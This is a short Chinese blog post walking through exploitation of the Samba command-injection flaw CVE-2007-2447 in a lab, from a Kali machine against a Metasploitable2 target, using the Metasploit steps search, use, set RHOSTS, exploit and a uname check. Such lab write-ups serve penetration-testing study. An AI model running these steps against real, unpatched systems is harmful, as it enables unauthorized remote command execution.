标签:sam spl bin asp 图片 远程 kali mic samba
CVE:CVE-2007-2447
Samba中负责在SAM数据库更新用户口令的代码未经过滤便将用户输入传输给了/bin/sh。如果在调用smb.conf中定义的外部脚本时,通过对/bin/sh的MS-RPC调用提交了恶意输入的话,就可能允许攻击者以nobody用户的权限执行任意命令。
?
攻击机 kali
IP 192.168.129.133
靶机 Metasploitable2
IP 192.168.129.128
?
msf中搜索samba
use 13 选择漏洞
show options 查看选项
set RHOSTS 设置要攻击的ip
exploit 开始攻击
之后uname -a验证
?
标签:sam spl bin asp 图片 远程 kali mic samba
原文地址:https://www.cnblogs.com/qxxaq/p/11642911.html
